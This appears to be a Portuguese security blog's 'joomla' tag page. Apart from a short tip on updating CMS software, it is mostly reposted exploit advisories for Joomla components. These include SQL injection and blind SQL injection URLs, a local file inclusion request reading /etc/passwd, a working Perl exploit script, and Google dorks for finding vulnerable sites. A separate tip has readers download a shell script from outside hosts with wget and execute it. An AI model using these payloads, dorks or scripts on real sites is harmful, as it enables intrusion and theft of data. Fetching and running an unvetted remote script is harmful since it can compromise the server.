Browsed by
Tag: joomla

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Joomla Component (com_jdirectory) SQL Injection Vulnerability


=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I’m Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####

[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ …others |
============================================================================================ |

Fonte: http://www.exploit-db.com/exploits/17603/

Joomla Component mod_spo SQL Injection Vulnerability

Joomla Component mod_spo SQL Injection Vulnerability


# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/[email protected]&spo_f_email[0][email protected]&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability


#! /usr/bin/perl -w

# Joomla Component JE Story Submit Local File Inclusion Vulnerability
# Author : v3n0m
# Date : July, 21-2011 GMT +7:00 Jakarta, Indonesia
# Software : JE Story Submit
# Vendor : http://joomlaextensions.co.in/
# License : GPLv2 or later
# Tested On: Joomla 1.5.x
# irc.yogyacarderlink.web.id - www.yogyacarderlink.web.id
#
# PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00
#

use LWP::UserAgent;
use HTTP::Request::Common;

my ($host, $file) = @ARGV ;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|==========================================================|\n";
print "| 'Joomla Component JE Story Submit Local File Inclusion' |\n";
print "| Coded by : v3n0m |\n";
print "| Dork : inurl:com_jesubmit |\n";
print "| |\n";
print "| www.yogyacarderlink.web.id |\n";
print "| |\n";
print "|===================================[ YOGYACARDERLINK ]====|\n";
print "\nUsage: perl $0 \n";
print "\tex: perl $0 http://www.site.com /etc/passwd\n\n";

$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ /\/\$/);

my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
$ua->timeout(10);

my $request = HTTP::Request->new();
my $response;
my $url = $host."index.php?";

my $req = HTTP::Request->new(POST => $host."index.php?");
$req->content_type('application/x-www-form-urlencoded');
$req->content("option=com_jesubmit&view=".("/.."x10).$file."%00");

$request = $ua->request($req);
$result = $request->content;

$result =~ s/<[^>]*>//g;

print $result . "\n";
exit;

Como verificar versões de CMS de maneira rápida e prática

Como verificar versões de CMS de maneira rápida e prática

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo:

[email protected]:˜#wget http://server.cmsversion.com/checktest.sh

ou

[email protected]:˜#wget http://www.libphp.net/checktest.sh

Em seguida fazer o seguinte

[email protected]:˜#chmod +x checktest.sh

[email protected]:˜#./checktest.sh -u logindeumacontanomeuserver

A saída deverá assemelhar-se com:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

Essa dica funciona para Joomla, WordPress, WHMCS e etc.

Joomla mdigg Component SQL Injection Vulnerability

Joomla mdigg Component SQL Injection Vulnerability

=====================================================================

.__         .__  __            .__    .___
____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
\/      \/|__|                                          \/
Exploit-ID is the Exploit Information Disclosure
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####
[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others                                                                              |

============================================================================================ |

 

Fonte: http://www.exploit-db.com/exploits/17464/

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

———————————————————————————
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
———————————————————————————

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[alt+64]gmail.com
Date : 19 June 2011
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
—————————————————————————

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Calc Builder
version : 0.0.1
Developer : Guillermo Santiago
License : GPLv2 or later type : Commercial
Date Added : 12 June 2011
Price : 9.90 €
Demo : http://components.moonsoft.es/democalcbuilder
Download : http://components.moonsoft.es/downloadcalcbuilder

Description :

CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.

—————————————————————————

I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~~
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C

A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Joomla Component (com_team) SQL Injection Vulnerability

Joomla Component (com_team) SQL Injection Vulnerability

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

Fonte: http://www.exploit-db.com/exploits/17412/

Joomla Component com_joomnik SQL Injection Vulnerability

Joomla Component com_joomnik SQL Injection Vulnerability

 

<------------------- header data start ------------------- >

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################

http://joomlacode.org/gf/project/joomnik/